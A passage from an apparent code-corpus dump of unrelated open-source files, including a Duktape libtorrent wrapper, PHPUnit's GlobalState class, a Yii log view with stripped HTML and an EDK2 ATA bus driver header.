zend_ce_countable);\n}\n/* }}} */\n"} {"text": "#include \r\n\r\n#include \r\n#include \r\n\r\n#include \"../common.hpp\"\r\n#include \"../../duktape.h\"\r\n\r\nusing namespace hadouken::scripting::modules;\r\nusing namespace hadouken::scripting::modules::bittorrent;\r\n\r\nvoid feed_handle_wrapper::initialize(duk_context* ctx, const libtorrent::feed_handle& handle)\r\n{\r\n static duk_function_list_entry functions[] =\r\n {\r\n { \"updateFeed\", update_feed, 0 },\r\n { \"getStatus\", get_feed_status, 0 },\r\n { \"getSettings\", get_settings, 0 },\r\n { \"setSettings\", set_settings, 1 },\r\n { NULL, NULL, 0 }\r\n };\r\n\r\n duk_idx_t idx = duk_push_object(ctx);\r\n duk_put_function_list(ctx, idx, functions);\r\n\r\n common::set_pointer(ctx, idx, new libtorrent::feed_handle(handle));\r\n\r\n duk_push_c_function(ctx, finalize, 1);\r\n duk_set_finalizer(ctx, -2);\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::finalize(duk_context* ctx)\r\n{\r\n common::finalize(ctx);\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::update_feed(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::get_feed_status(duk_context* ctx)\r\n{\r\n libtorrent::feed_handle* handle = common::get_pointer(ctx);\r\n feed_status_wrapper::initialize(ctx, handle->get_feed_status());\r\n return 1;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::get_settings(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n\r\nduk_ret_t feed_handle_wrapper::set_settings(duk_context* ctx)\r\n{\r\n return 0;\r\n}\r\n"} {"text": "{\n \"images\" : [\n {\n \"idiom\" : \"universal\",\n \"scale\" : \"1x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"dislike_details_20x20_@2x.png\",\n \"scale\" : \"2x\"\n },\n {\n \"idiom\" : \"universal\",\n \"filename\" : \"dislike_details_20x20_@3x.png\",\n \"scale\" : \"3x\"\n }\n ],\n \"info\" : {\n \"version\" : 1,\n \"author\" : \"xcode\"\n }\n}"} {"text": "load(\"@prysm//tools/go:def.bzl\", \"go_library\")\n\ngo_library(\n name = 
\"go_default_library\",\n srcs = [\n \"protector_mock.go\",\n \"slasher_mock.go\",\n ],\n importpath = \"github.com/prysmaticlabs/prysm/validator/testing\",\n visibility = [\"//validator:__subpackages__\"],\n deps = [\n \"//proto/slashing:go_default_library\",\n \"@com_github_golang_protobuf//proto:go_default_library\",\n \"@com_github_prysmaticlabs_ethereumapis//eth/v1alpha1:go_default_library\",\n \"@org_golang_google_grpc//:go_default_library\",\n ],\n)\n"} {"text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage android.sax;\n\n/**\n * Listens for the end of elements.\n */\npublic interface EndElementListener {\n\n /**\n * Invoked at the end of an element.\n */\n void end();\n}\n"} {"text": "\n\n\t\n\t\t\n\t\n\t\n\t \n\t\t\n\t\t\n\t\t\n\t\n'#DFFFE0',\n\tCLogger::LEVEL_INFO=>'#FFFFDF',\n\tCLogger::LEVEL_WARNING=>'#FFDFE5',\n\tCLogger::LEVEL_ERROR=>'#FFC0CB',\n);\nforeach($data as $index=>$log)\n{\n\t$color=($index%2)?'#F5F5F5':'#FFFFFF';\n\tif(isset($colors[$log[1]]))\n\t\t$color=$colors[$log[1]];\n\t$message='
<pre>'.CHtml::encode(wordwrap($log[0])).'</pre>
';\n\t$time=date('H:i:s.',$log[3]).(int)(($log[3]-(int)$log[3])*1000000);\n\n\techo <<\n\t\t\n\t\t\n\t\t\n\t\t\n\t\nEOD;\n}\n?>\n
\n\t\t\tApplication Log\n\t\t
TimestampLevelCategoryMessage
{$time}{$log[1]}{$log[2]}{$message}
\n"} {"text": "\n */\ninterface Swift_Signers_HeaderSigner extends Swift_Signer, Swift_InputByteStream\n{\n /**\n * Exclude an header from the signed headers\n *\n * @param string $header_name\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function ignoreHeader($header_name);\n\n /**\n * Prepare the Signer to get a new Body\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function startBody();\n\n /**\n * Give the signal that the body has finished streaming\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function endBody();\n\n /**\n * Give the headers already given\n *\n * @param Swift_Mime_SimpleHeaderSet $headers\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function setHeaders(Swift_Mime_HeaderSet $headers);\n\n /**\n * Add the header(s) to the headerSet\n *\n * @param Swift_Mime_HeaderSet $headers\n *\n * @return Swift_Signers_HeaderSigner\n */\n public function addSignature(Swift_Mime_HeaderSet $headers);\n\n /**\n * Return the list of header a signer might tamper\n *\n * @return array\n */\n public function getAlteredHeaders();\n}\n"} {"text": "# Sales Sequence Functional Tests\n\nThe Functional Test Module for **Magento Sales Sequence** module.\n"} {"text": "/**\n ******************************************************************************\n *\n * @file instrumentation.c\n * @author The OpenPilot Team, http://www.openpilot.org Copyright (C) 2014.\n * @brief Instrumentation infrastructure\n * UAVObject wrapper layer for PiOS instrumentation\n * @see The GNU Public License (GPL) Version 3\n *\n *****************************************************************************/\n/*\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful, but\n * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\n * or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU General Public License\n * for more details.\n *\n * You should have received a copy of the GNU General Public License along\n * with this program; if not, write to the Free Software Foundation, Inc.,\n * 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA\n */\n\n#include \n#include \n#include \n\nstatic uint8_t publishedCountersInstances = 0;\nstatic void counterCallback(const pios_perf_counter_t *counter, const int8_t index, void *context);\nstatic xSemaphoreHandle sem;\nvoid InstrumentationInit()\n{\n PerfCounterInitialize();\n publishedCountersInstances = 1;\n vSemaphoreCreateBinary(sem);\n}\n\nvoid InstrumentationPublishAllCounters()\n{\n if (xSemaphoreTake(sem, 0) != pdTRUE) {\n return;\n }\n PIOS_Instrumentation_ForEachCounter(&counterCallback, NULL);\n xSemaphoreGive(sem);\n}\n\nvoid counterCallback(const pios_perf_counter_t *counter, const int8_t index, __attribute__((unused)) void *context)\n{\n if (publishedCountersInstances < index + 1) {\n PerfCounterCreateInstance();\n publishedCountersInstances++;\n }\n PerfCounterData data;\n data.Id = counter->id;\n data.Counter.Max = counter->max;\n data.Counter.Min = counter->min;\n data.Counter.Value = counter->value;\n PerfCounterInstSet(index, &data);\n}\n"} {"text": "\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\nnamespace PHPUnit\\Util;\n\nuse function array_keys;\nuse function array_reverse;\nuse function defined;\nuse function get_defined_constants;\nuse function get_included_files;\nuse function in_array;\nuse function ini_get_all;\nuse function is_array;\nuse function is_file;\nuse function is_scalar;\nuse function preg_match;\nuse function serialize;\nuse function sprintf;\nuse function strpos;\nuse function var_export;\nuse Closure;\n\n/**\n * @internal This class is not covered by the backward compatibility promise for PHPUnit\n */\nfinal class GlobalState\n{\n /**\n * @var string[]\n */\n private const SUPER_GLOBAL_ARRAYS = [\n '_ENV',\n '_POST',\n '_GET',\n '_COOKIE',\n '_SERVER',\n '_FILES',\n '_REQUEST',\n ];\n\n /**\n * @throws Exception\n */\n public static function getIncludedFilesAsString(): string\n {\n return self::processIncludedFilesAsString(get_included_files());\n }\n\n /**\n * @param string[] $files\n *\n * @throws Exception\n */\n public static function processIncludedFilesAsString(array $files): string\n {\n $excludeList = new ExcludeList;\n $prefix = false;\n $result = '';\n\n if (defined('__PHPUNIT_PHAR__')) {\n $prefix = 'phar://' . __PHPUNIT_PHAR__ . '/';\n }\n\n // Do not process bootstrap script\n unset($files[0]);\n\n foreach (array_reverse($files) as $file) {\n if (!empty($GLOBALS['__PHPUNIT_ISOLATION_EXCLUDE_LIST']) &&\n in_array($file, $GLOBALS['__PHPUNIT_ISOLATION_EXCLUDE_LIST'], true)) {\n continue;\n }\n\n if ($prefix !== false && strpos($file, $prefix) === 0) {\n continue;\n }\n\n // Skip virtual file system protocols\n if (preg_match('/^(vfs|phpvfs[a-z0-9]+):/', $file)) {\n continue;\n }\n\n if (!$excludeList->isExcluded($file) && is_file($file)) {\n $result = 'require_once \\'' . $file . \"';\\n\" . $result;\n }\n }\n\n return $result;\n }\n\n public static function getIniSettingsAsString(): string\n {\n $result = '';\n\n foreach (ini_get_all(null, false) as $key => $value) {\n $result .= sprintf(\n '@ini_set(%s, %s);' . 
\"\\n\",\n self::exportVariable($key),\n self::exportVariable((string) $value)\n );\n }\n\n return $result;\n }\n\n public static function getConstantsAsString(): string\n {\n $constants = get_defined_constants(true);\n $result = '';\n\n if (isset($constants['user'])) {\n foreach ($constants['user'] as $name => $value) {\n $result .= sprintf(\n 'if (!defined(\\'%s\\')) define(\\'%s\\', %s);' . \"\\n\",\n $name,\n $name,\n self::exportVariable($value)\n );\n }\n }\n\n return $result;\n }\n\n public static function getGlobalsAsString(): string\n {\n $result = '';\n\n foreach (self::SUPER_GLOBAL_ARRAYS as $superGlobalArray) {\n if (isset($GLOBALS[$superGlobalArray]) && is_array($GLOBALS[$superGlobalArray])) {\n foreach (array_keys($GLOBALS[$superGlobalArray]) as $key) {\n if ($GLOBALS[$superGlobalArray][$key] instanceof Closure) {\n continue;\n }\n\n $result .= sprintf(\n '$GLOBALS[\\'%s\\'][\\'%s\\'] = %s;' . \"\\n\",\n $superGlobalArray,\n $key,\n self::exportVariable($GLOBALS[$superGlobalArray][$key])\n );\n }\n }\n }\n\n $excludeList = self::SUPER_GLOBAL_ARRAYS;\n $excludeList[] = 'GLOBALS';\n\n foreach (array_keys($GLOBALS) as $key) {\n if (!$GLOBALS[$key] instanceof Closure && !in_array($key, $excludeList, true)) {\n $result .= sprintf(\n '$GLOBALS[\\'%s\\'] = %s;' . \"\\n\",\n $key,\n self::exportVariable($GLOBALS[$key])\n );\n }\n }\n\n return $result;\n }\n\n private static function exportVariable($variable): string\n {\n if (is_scalar($variable) || $variable === null ||\n (is_array($variable) && self::arrayOnlyContainsScalars($variable))) {\n return var_export($variable, true);\n }\n\n return 'unserialize(' . var_export(serialize($variable), true) . ')';\n }\n\n private static function arrayOnlyContainsScalars(array $array): bool\n {\n $result = true;\n\n foreach ($array as $element) {\n if (is_array($element)) {\n $result = self::arrayOnlyContainsScalars($element);\n } elseif (!is_scalar($element) && $element !== null) {\n $result = false;\n }\n\n if (!$result) {\n break;\n }\n }\n\n return $result;\n }\n}\n"} {"text": "/** @file\r\n Master header file for ATA Bus Driver.\r\n\r\n This file defines common data structures, macro definitions and some module\r\n internal function header files.\r\n\r\n Copyright (c) 2009 - 2015, Intel Corporation. All rights reserved.
\r\n SPDX-License-Identifier: BSD-2-Clause-Patent\r\n\r\n**/\r\n\r\n#ifndef _ATA_BUS_H_\r\n#define _ATA_BUS_H_\r\n\r\n#include \r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n#include \r\n\r\n#include \r\n\r\n//\r\n// Time out value for ATA pass through protocol\r\n//\r\n#define ATA_TIMEOUT EFI_TIMER_PERIOD_SECONDS (3)\r\n\r\n//\r\n// Maximum number of times to retry ATA command\r\n//\r\n#define MAX_RETRY_TIMES 3\r\n\r\n//\r\n// The maximum total sectors count in 28 bit addressing mode\r\n//\r\n#define MAX_28BIT_ADDRESSING_CAPACITY 0xfffffff\r\n\r\n//\r\n// The maximum ATA transaction sector count in 28 bit addressing mode.\r\n//\r\n#define MAX_28BIT_TRANSFER_BLOCK_NUM 0x100\r\n\r\n//\r\n// The maximum ATA transaction sector count in 48 bit addressing mode.\r\n//\r\n//#define MAX_48BIT_TRANSFER_BLOCK_NUM 0x10000\r\n\r\n//\r\n// BugBug: if the TransferLength is equal with 0x10000 (the 48bit max length),\r\n// there is a bug that even the register interrupt bit has been sit, the buffer\r\n// seems not ready. Change the Maximum Sector Numbers to 0xFFFF to work round\r\n// this issue.\r\n//\r\n#define MAX_48BIT_TRANSFER_BLOCK_NUM 0xFFFF\r\n\r\n//\r\n// The maximum model name in ATA identify data\r\n//\r\n#define MAX_MODEL_NAME_LEN 40\r\n\r\n#define ATA_TASK_SIGNATURE SIGNATURE_32 ('A', 'T', 'S', 'K')\r\n#define ATA_DEVICE_SIGNATURE SIGNATURE_32 ('A', 'B', 'I', 'D')\r\n#define ATA_SUB_TASK_SIGNATURE SIGNATURE_32 ('A', 'S', 'T', 'S')\r\n#define IS_ALIGNED(addr, size) (((UINTN) (addr) & (size - 1)) == 0)\r\n\r\n//\r\n// ATA bus data structure for ATA controller\r\n//\r\ntypedef struct {\r\n EFI_ATA_PASS_THRU_PROTOCOL *AtaPassThru;\r\n EFI_HANDLE Controller;\r\n EFI_DEVICE_PATH_PROTOCOL *ParentDevicePath;\r\n EFI_HANDLE DriverBindingHandle;\r\n} ATA_BUS_DRIVER_DATA;\r\n\r\n//\r\n// ATA device data structure for each child device\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n\r\n EFI_HANDLE Handle;\r\n EFI_BLOCK_IO_PROTOCOL BlockIo;\r\n EFI_BLOCK_IO2_PROTOCOL BlockIo2;\r\n EFI_BLOCK_IO_MEDIA BlockMedia;\r\n EFI_DISK_INFO_PROTOCOL DiskInfo;\r\n EFI_DEVICE_PATH_PROTOCOL *DevicePath;\r\n EFI_STORAGE_SECURITY_COMMAND_PROTOCOL StorageSecurity;\r\n\r\n ATA_BUS_DRIVER_DATA *AtaBusDriverData;\r\n UINT16 Port;\r\n UINT16 PortMultiplierPort;\r\n\r\n //\r\n // Buffer for the execution of ATA pass through protocol\r\n //\r\n EFI_ATA_PASS_THRU_COMMAND_PACKET Packet;\r\n EFI_ATA_COMMAND_BLOCK Acb;\r\n EFI_ATA_STATUS_BLOCK *Asb;\r\n\r\n BOOLEAN UdmaValid;\r\n BOOLEAN Lba48Bit;\r\n\r\n //\r\n // Cached data for ATA identify data\r\n //\r\n ATA_IDENTIFY_DATA *IdentifyData;\r\n\r\n EFI_UNICODE_STRING_TABLE *ControllerNameTable;\r\n CHAR16 ModelName[MAX_MODEL_NAME_LEN + 1];\r\n\r\n LIST_ENTRY AtaTaskList;\r\n LIST_ENTRY AtaSubTaskList;\r\n BOOLEAN Abort;\r\n} ATA_DEVICE;\r\n\r\n//\r\n// Sub-Task for the non blocking I/O\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n ATA_DEVICE *AtaDevice;\r\n EFI_BLOCK_IO2_TOKEN *Token;\r\n UINTN *UnsignalledEventCount;\r\n EFI_ATA_PASS_THRU_COMMAND_PACKET Packet;\r\n BOOLEAN *IsError;// Indicate whether meeting error during source allocation for new task.\r\n LIST_ENTRY TaskEntry;\r\n} ATA_BUS_ASYN_SUB_TASK;\r\n\r\n//\r\n// Task for the non blocking I/O\r\n//\r\ntypedef struct {\r\n UINT32 Signature;\r\n EFI_BLOCK_IO2_TOKEN *Token;\r\n ATA_DEVICE *AtaDevice;\r\n UINT8 *Buffer;\r\n EFI_LBA StartLba;\r\n 
UINTN NumberOfBlocks;\r\n BOOLEAN IsWrite;\r\n LIST_ENTRY TaskEntry;\r\n} ATA_BUS_ASYN_TASK;\r\n\r\n#define ATA_DEVICE_FROM_BLOCK_IO(a) CR (a, ATA_DEVICE, BlockIo, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_BLOCK_IO2(a) CR (a, ATA_DEVICE, BlockIo2, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_DISK_INFO(a) CR (a, ATA_DEVICE, DiskInfo, ATA_DEVICE_SIGNATURE)\r\n#define ATA_DEVICE_FROM_STORAGE_SECURITY(a) CR (a, ATA_DEVICE, StorageSecurity, ATA_DEVICE_SIGNATURE)\r\n#define ATA_ASYN_SUB_TASK_FROM_ENTRY(a) CR (a, ATA_BUS_ASYN_SUB_TASK, TaskEntry, ATA_SUB_TASK_SIGNATURE)\r\n#define ATA_ASYN_TASK_FROM_ENTRY(a) CR (a, ATA_BUS_ASYN_TASK, TaskEntry, ATA_TASK_SIGNATURE)\r\n\r\n//\r\n// Global Variables\r\n//\r\nextern EFI_DRIVER_BINDING_PROTOCOL gAtaBusDriverBinding;\r\nextern EFI_COMPONENT_NAME_PROTOCOL gAtaBusComponentName;\r\nextern EFI_COMPONENT_NAME2_PROTOCOL gAtaBusComponentName2;\r\n\r\n/**\r\n Allocates an aligned buffer for ATA device.\r\n\r\n This function allocates an aligned buffer for the ATA device to perform\r\n ATA pass through operations. The alignment requirement is from ATA pass\r\n through interface.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n @param BufferSize The request buffer size.\r\n\r\n @return A pointer to the aligned buffer or NULL if the allocation fails.\r\n\r\n**/\r\nVOID *\r\nAllocateAlignedBuffer (\r\n IN ATA_DEVICE *AtaDevice,\r\n IN UINTN BufferSize\r\n );\r\n\r\n/**\r\n Frees an aligned buffer for ATA device.\r\n\r\n This function frees an aligned buffer for the ATA device to perform\r\n ATA pass through operations.\r\n\r\n @param Buffer The aligned buffer to be freed.\r\n @param BufferSize The request buffer size.\r\n\r\n**/\r\nVOID\r\nFreeAlignedBuffer (\r\n IN VOID *Buffer,\r\n IN UINTN BufferSize\r\n );\r\n\r\n/**\r\n Free SubTask.\r\n\r\n @param[in, out] Task Pointer to task to be freed.\r\n\r\n**/\r\nVOID\r\nEFIAPI\r\nFreeAtaSubTask (\r\n IN OUT ATA_BUS_ASYN_SUB_TASK *Task\r\n );\r\n\r\n/**\r\n Wrapper for EFI_ATA_PASS_THRU_PROTOCOL.ResetDevice().\r\n\r\n This function wraps the ResetDevice() invocation for ATA pass through function\r\n for an ATA device.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n\r\n @return The return status from EFI_ATA_PASS_THRU_PROTOCOL.PassThru().\r\n\r\n**/\r\nEFI_STATUS\r\nResetAtaDevice (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n\r\n/**\r\n Discovers whether it is a valid ATA device.\r\n\r\n This function issues ATA_CMD_IDENTIFY_DRIVE command to the ATA device to identify it.\r\n If the command is executed successfully, it then identifies it and initializes\r\n the Media information in Block IO protocol interface.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n\r\n @retval EFI_SUCCESS The device is successfully identified and Media information\r\n is correctly initialized.\r\n @return others Some error occurs when discovering the ATA device.\r\n\r\n**/\r\nEFI_STATUS\r\nDiscoverAtaDevice (\r\n IN OUT ATA_DEVICE *AtaDevice\r\n );\r\n\r\n/**\r\n Read or write a number of blocks from ATA device.\r\n\r\n This function performs ATA pass through transactions to read/write data from/to\r\n ATA device. 
It may separate the read/write request into several ATA pass through\r\n transactions.\r\n\r\n @param[in, out] AtaDevice The ATA child device involved for the operation.\r\n @param[in, out] Buffer The pointer to the current transaction buffer.\r\n @param[in] StartLba The starting logical block address to be accessed.\r\n @param[in] NumberOfBlocks The block number or sector count of the transfer.\r\n @param[in] IsWrite Indicates whether it is a write operation.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n\r\n @retval EFI_SUCCESS The data transfer is complete successfully.\r\n @return others Some error occurs when transferring data.\r\n\r\n**/\r\nEFI_STATUS\r\nAccessAtaDevice(\r\n IN OUT ATA_DEVICE *AtaDevice,\r\n IN OUT UINT8 *Buffer,\r\n IN EFI_LBA StartLba,\r\n IN UINTN NumberOfBlocks,\r\n IN BOOLEAN IsWrite,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token\r\n );\r\n\r\n/**\r\n Trust transfer data from/to ATA device.\r\n\r\n This function performs one ATA pass through transaction to do a trust transfer from/to\r\n ATA device. It chooses the appropriate ATA command and protocol to invoke PassThru\r\n interface of ATA pass through.\r\n\r\n @param AtaDevice The ATA child device involved for the operation.\r\n @param Buffer The pointer to the current transaction buffer.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param TransferLength The block number or sector count of the transfer.\r\n @param IsTrustSend Indicates whether it is a trust send operation or not.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param TransferLengthOut A pointer to a buffer to store the size in bytes of the data\r\n written to the buffer. Ignore it when IsTrustSend is TRUE.\r\n\r\n @retval EFI_SUCCESS The data transfer is complete successfully.\r\n @return others Some error occurs when transferring data.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nTrustTransferAtaDevice (\r\n IN OUT ATA_DEVICE *AtaDevice,\r\n IN OUT VOID *Buffer,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN TransferLength,\r\n IN BOOLEAN IsTrustSend,\r\n IN UINT64 Timeout,\r\n OUT UINTN *TransferLengthOut\r\n );\r\n\r\n//\r\n// Protocol interface prototypes\r\n//\r\n/**\r\n Tests to see if this driver supports a given controller. If a child device is provided,\r\n it further tests to see if this driver supports creating a handle for the specified child device.\r\n\r\n This function checks to see if the driver specified by This supports the device specified by\r\n ControllerHandle. Drivers will typically use the device path attached to\r\n ControllerHandle and/or the services from the bus I/O abstraction attached to\r\n ControllerHandle to determine if the driver supports ControllerHandle. This function\r\n may be called many times during platform initialization. 
In order to reduce boot times, the tests\r\n performed by this function must be very small, and take as little time as possible to execute. This\r\n function must not change the state of any hardware devices, and this function must be aware that the\r\n device specified by ControllerHandle may already be managed by the same driver or a\r\n different driver. This function must match its calls to AllocatePages() with FreePages(),\r\n AllocatePool() with FreePool(), and OpenProtocol() with CloseProtocol().\r\n Since ControllerHandle may have been previously started by the same driver, if a protocol is\r\n already in the opened state, then it must not be closed with CloseProtocol(). This is required\r\n to guarantee the state of ControllerHandle is not modified by this function.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle The handle of the controller to test. This handle\r\n must support a protocol interface that supplies\r\n an I/O abstraction to the driver.\r\n @param[in] RemainingDevicePath A pointer to the remaining portion of a device path. This\r\n parameter is ignored by device drivers, and is optional for bus\r\n drivers. For bus drivers, if this parameter is not NULL, then\r\n the bus driver must determine if the bus controller specified\r\n by ControllerHandle and the child controller specified\r\n by RemainingDevicePath are both supported by this\r\n bus driver.\r\n\r\n @retval EFI_SUCCESS The device specified by ControllerHandle and\r\n RemainingDevicePath is supported by the driver specified by This.\r\n @retval EFI_ALREADY_STARTED The device specified by ControllerHandle and\r\n RemainingDevicePath is already being managed by the driver\r\n specified by This.\r\n @retval EFI_ACCESS_DENIED The device specified by ControllerHandle and\r\n RemainingDevicePath is already being managed by a different\r\n driver or an application that requires exclusive access.\r\n Currently not implemented.\r\n @retval EFI_UNSUPPORTED The device specified by ControllerHandle and\r\n RemainingDevicePath is not supported by the driver specified by This.\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingSupported (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath\r\n );\r\n\r\n/**\r\n Starts a device controller or a bus controller.\r\n\r\n The Start() function is designed to be invoked from the EFI boot service ConnectController().\r\n As a result, much of the error checking on the parameters to Start() has been moved into this\r\n common boot service. It is legal to call Start() from other locations,\r\n but the following calling restrictions must be followed or the system behavior will not be deterministic.\r\n 1. ControllerHandle must be a valid EFI_HANDLE.\r\n 2. If RemainingDevicePath is not NULL, then it must be a pointer to a naturally aligned\r\n EFI_DEVICE_PATH_PROTOCOL.\r\n 3. Prior to calling Start(), the Supported() function for the driver specified by This must\r\n have been called with the same calling parameters, and Supported() must have returned EFI_SUCCESS.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle The handle of the controller to start. This handle\r\n must support a protocol interface that supplies\r\n an I/O abstraction to the driver.\r\n @param[in] RemainingDevicePath A pointer to the remaining portion of a device path. 
This\r\n parameter is ignored by device drivers, and is optional for bus\r\n drivers. For a bus driver, if this parameter is NULL, then handles\r\n for all the children of Controller are created by this driver.\r\n If this parameter is not NULL and the first Device Path Node is\r\n not the End of Device Path Node, then only the handle for the\r\n child device specified by the first Device Path Node of\r\n RemainingDevicePath is created by this driver.\r\n If the first Device Path Node of RemainingDevicePath is\r\n the End of Device Path Node, no child handle is created by this\r\n driver.\r\n\r\n @retval EFI_SUCCESS The device was started.\r\n @retval EFI_DEVICE_ERROR The device could not be started due to a device error.Currently not implemented.\r\n @retval EFI_OUT_OF_RESOURCES The request could not be completed due to a lack of resources.\r\n @retval Others The driver failded to start the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingStart (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath\r\n );\r\n\r\n/**\r\n Stops a device controller or a bus controller.\r\n\r\n The Stop() function is designed to be invoked from the EFI boot service DisconnectController().\r\n As a result, much of the error checking on the parameters to Stop() has been moved\r\n into this common boot service. It is legal to call Stop() from other locations,\r\n but the following calling restrictions must be followed or the system behavior will not be deterministic.\r\n 1. ControllerHandle must be a valid EFI_HANDLE that was used on a previous call to this\r\n same driver's Start() function.\r\n 2. The first NumberOfChildren handles of ChildHandleBuffer must all be a valid\r\n EFI_HANDLE. In addition, all of these handles must have been created in this driver's\r\n Start() function, and the Start() function must have called OpenProtocol() on\r\n ControllerHandle with an Attribute of EFI_OPEN_PROTOCOL_BY_CHILD_CONTROLLER.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle A handle to the device being stopped. The handle must\r\n support a bus specific I/O protocol for the driver\r\n to use to stop the device.\r\n @param[in] NumberOfChildren The number of child device handles in ChildHandleBuffer.\r\n @param[in] ChildHandleBuffer An array of child handles to be freed. May be NULL\r\n if NumberOfChildren is 0.\r\n\r\n @retval EFI_SUCCESS The device was stopped.\r\n @retval EFI_DEVICE_ERROR The device could not be stopped due to a device error.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingStop (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN UINTN NumberOfChildren,\r\n IN EFI_HANDLE *ChildHandleBuffer\r\n );\r\n\r\n\r\n/**\r\n Retrieves a Unicode string that is the user readable name of the driver.\r\n\r\n This function retrieves the user readable name of a driver in the form of a\r\n Unicode string. If the driver specified by This has a user readable name in\r\n the language specified by Language, then a pointer to the driver name is\r\n returned in DriverName, and EFI_SUCCESS is returned. 
If the driver specified\r\n by This does not support the language specified by Language,\r\n then EFI_UNSUPPORTED is returned.\r\n\r\n @param This[in] A pointer to the EFI_COMPONENT_NAME2_PROTOCOL or\r\n EFI_COMPONENT_NAME_PROTOCOL instance.\r\n\r\n @param Language[in] A pointer to a Null-terminated ASCII string\r\n array indicating the language. This is the\r\n language of the driver name that the caller is\r\n requesting, and it must match one of the\r\n languages specified in SupportedLanguages. The\r\n number of languages supported by a driver is up\r\n to the driver writer. Language is specified\r\n in RFC 4646 or ISO 639-2 language code format.\r\n\r\n @param DriverName[out] A pointer to the Unicode string to return.\r\n This Unicode string is the name of the\r\n driver specified by This in the language\r\n specified by Language.\r\n\r\n @retval EFI_SUCCESS The Unicode string for the Driver specified by\r\n This and the language specified by Language was\r\n returned in DriverName.\r\n\r\n @retval EFI_INVALID_PARAMETER Language is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER DriverName is NULL.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This does not support\r\n the language specified by Language.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusComponentNameGetDriverName (\r\n IN EFI_COMPONENT_NAME_PROTOCOL *This,\r\n IN CHAR8 *Language,\r\n OUT CHAR16 **DriverName\r\n );\r\n\r\n\r\n/**\r\n Retrieves a Unicode string that is the user readable name of the controller\r\n that is being managed by a driver.\r\n\r\n This function retrieves the user readable name of the controller specified by\r\n ControllerHandle and ChildHandle in the form of a Unicode string. If the\r\n driver specified by This has a user readable name in the language specified by\r\n Language, then a pointer to the controller name is returned in ControllerName,\r\n and EFI_SUCCESS is returned. If the driver specified by This is not currently\r\n managing the controller specified by ControllerHandle and ChildHandle,\r\n then EFI_UNSUPPORTED is returned. If the driver specified by This does not\r\n support the language specified by Language, then EFI_UNSUPPORTED is returned.\r\n\r\n @param This[in] A pointer to the EFI_COMPONENT_NAME2_PROTOCOL or\r\n EFI_COMPONENT_NAME_PROTOCOL instance.\r\n\r\n @param ControllerHandle[in] The handle of a controller that the driver\r\n specified by This is managing. This handle\r\n specifies the controller whose name is to 